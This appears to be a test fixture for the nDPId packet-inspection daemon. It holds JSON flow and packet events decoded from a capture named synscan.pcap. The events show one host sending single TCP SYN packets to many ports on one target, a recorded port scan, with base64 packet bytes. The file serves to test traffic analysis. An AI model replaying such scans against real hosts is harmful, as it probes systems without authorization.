+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyx4AACUGWFSsEAAIQA2GNIzTAgHdU4MZAAAAAGACCAAuiwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsagcAADMGq2usEAAIQA2GNIzTS1PdU4MZAAAAAGACEADdOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsEW4AAC0GCgWsEAAIQA2GNIzTBGbdU4MZAAAAAGACCAAsJgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAscDEAADoGnkGsEAAIQA2GNIzTI\/fdU4MZAAAAAGACDAAIlQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsJJwAADMG8NasEAAIQA2GNIzT4uDdU4MZAAAAAGACEABFqwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1sAACUG7BesEAAIQA2GNIzTF0ndU4MZAAAAAGACCAAZQwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsFcMAACoGCLCsEAAIQA2GNIzT3aHdU4MZAAAAAGACDABO6gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAshNgAAC4GlZqsEAAIQA2GNIzTGabdU4MZAAAAAGACDAAS5gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTIcAADAGy+usEAAIQA2GNIzTBDXdU4MZAAAAAGACBAAwVwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsBBMAADAGFGCsEAAIQA2GNIzTgATdU4MZAAAAAGACBAC0hwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDhkAACkGEVqsEAAIQA2GNIzTBB\/dU4MZAAAAAGACCAAsbQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsrPEAADMGaIGsEAAIQA2GNIzTAFjdU4MZAAAAAGACEAAoNAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs5rAAADcGKsKsEAAIQA2GNIzTBAvdU4MZAAAAAGACEAAkgQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AAC0GxlOsEAAIQA2GNIzTTiDdU4MZAAAAAGACCADiawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs7JwAACgGM9asEAAIQA2GNIzTCI\/dU4MZAAAAAGACBAAr\/QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVPkAACcGzHmsEAAIQA2GNIzTBHndU4MZAAAAAGACEAAkEwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsGHUAACwGA\/6sEAAIQA2GNIzTDNPdU4MZAAAAAGACBAAnuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsE9wAADUG\/5asEAAIQA2GNIzTBUjdU4MZAAAAAGACCAArRAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsnvwAACgGgXasEAAIQA2GNIzTAh3dU4MZAAAAAGACBAAybwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACoGKpusEAAIQA2GNIzT387dU4MZAAAAAGACDABMvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAs1hEAADoGOGGsEAAIQA2GNIzTBQfdU4MZAAAAAGACDAAnhQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEYAADMGdSysEAAIQA2GNIzTABTdU4MZAAAAAGACEAAoeAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060598,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_packet_id":1,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060598,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSsAACcG5EesEAAIQA2GNIzTPvHdU4MZAAAAAGACEADpmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs6VAAADkGJiKsEAAIQA2GNIzTCf3dU4MZAAAAAGACCAAmjwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAspgEAADUGbXGsEAAIQA2GNIzTDJXdU4MZAAAAAGACCAAj9wAAAgQFtA=="} 